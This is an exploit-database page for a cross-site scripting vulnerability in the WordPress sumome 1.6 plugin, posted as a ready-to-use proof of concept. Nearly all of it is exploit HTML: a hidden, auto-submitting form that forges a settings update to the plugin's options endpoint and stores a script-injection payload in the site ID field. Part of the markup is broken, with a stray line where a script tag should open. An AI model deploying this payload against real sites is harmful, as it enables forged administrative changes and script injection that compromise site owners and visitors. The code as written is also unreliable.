Wordpress sumome 1.6 Cross Site Scripting Vulnerability



EKU-ID: 4489 CVE: OSVDB-ID:
Author: Ashiyane Published: 2015-01-06 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


######################
# Exploit Title : Wordpress sumome 1.6 Cross Site Scripting
  
# Exploit Author : Ashiyane Digital Security Team
  
# Vendor Homepage : https://wordpress.org/plugins/sumome/
  
# Software Link :https://downloads.wordpress.org/plugin/sumome.zip
  
# Date : 2015-01-03
  
# Tested on : Windows 7 / Mozilla Firefox
######################
  
# Location : http://127.0.0.1/wordpress/wp-admin/options-general.php?page=sumome
  
######################
  
Exploit Code:
  
<html>
<body>
<style>
#test{
display:none;
}
</style>
  
<div id="test">
<form method="post" action="http://localhost/wordpress/wp-admin/options.php">
<input type='hidden' name='option_page' value='sumome' /><input type="hidden"
name="action" value="update" /><input type="hidden" id="_wpnonce"
name="_wpnonce" value="934a83b2a9" /><input type="hidden"
name="_wp_http_referer"
value="/wordpress/wp-admin/options-general.php?page=sumome&amp;settings-updated=true" /> <div
class="sumome-instructions">
  
  
<input type="text" name="sumome_site_id" id="sumome_site_id"
value='"><script>alert(1)</script>' style="width: 540px"
<p class="submit"><input type="submit" name="submit" id="submit"
class="button button-primary" value="Save Changes" /></p> </form>
  
</div>
**********
function clickin(){
document.getElementById('submit').click()
}setTimeout("clickin()",0000);
</script>
</body>
</html>